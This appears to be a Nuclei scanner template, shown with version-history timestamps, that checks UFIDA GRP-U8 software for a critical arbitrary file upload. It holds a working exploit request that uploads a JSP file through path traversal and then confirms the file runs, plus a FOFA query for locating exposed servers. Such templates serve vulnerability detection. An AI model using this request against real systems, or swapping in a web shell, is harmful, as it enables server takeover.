2023-09-15 12:23:57 +00:00
id : grp-u8-uploadfiledata
2023-08-18 03:22:06 +00:00
info :
2023-09-15 12:23:57 +00:00
name : UFIDA GRP-U8 UploadFileData - Arbitrary File Upload
2023-08-18 03:22:06 +00:00
author : SleepingBag945
severity : critical
2023-09-15 12:23:57 +00:00
description : |
File upload vulnerability in UFIDA U8+ERP customer relationship management software. An attacker can use this vulnerability to gain control of the server.
2023-08-18 03:22:06 +00:00
reference :
2023-09-15 12:23:57 +00:00
- https://mp.weixin.qq.com/s/DZXFxLC7fFKbPUWrdyITag
metadata :
2023-10-14 11:27:55 +00:00
verified : true
2023-09-15 12:23:57 +00:00
max-request : 2
fofa-query : title="用友GRP-U8行政事业内控管理软件"
tags : yonyou,fileupload,grp,intrusive
2023-08-18 03:22:06 +00:00
http :
- raw :
- |
POST /UploadFileData?action=upload_file&filename=../{{randstr_1}}.jsp HTTP/1.1
2023-09-15 12:23:57 +00:00
Host : {{Hostname}}
2023-08-18 03:22:06 +00:00
Content-Length : 327
Accept : */*
Content-Type : multipart/form-data; boundary=----WebKitFormBoundaryqoqnjtcw
Accept-Encoding : gzip
------WebKitFormBoundaryqoqnjtcw
Content-Disposition : form-data; name="upload"; filename="emgeyr.jsp"
Content-Type : application/octet-stream
<% {out.print("{{randstr_2}}");} %>
------WebKitFormBoundaryqoqnjtcw
Content-Disposition : form-data; name="submit"
submit
------WebKitFormBoundaryqoqnjtcw--
- |
GET /R9iPortal/{{randstr_1}}.jsp HTTP/1.1
Host : {{Hostname}}
Accept-Encoding : gzip
req-condition : true
matchers :
- type : dsl
dsl :
- "status_code_1 == 200 && contains(body_1,'showSucceedMsg')"
- "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')"
2023-10-14 11:27:55 +00:00
condition : and
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100c98e74ec461c5c537d05af10de78d63dede3e2b386f785d17ebb146583e6abcc022100d1b075a02e602048aedbdbb03dfb399f9f79bcd2a5ee640a42206cb6e2aa0e7f:922c64590222798bb761d5b6d8e72950
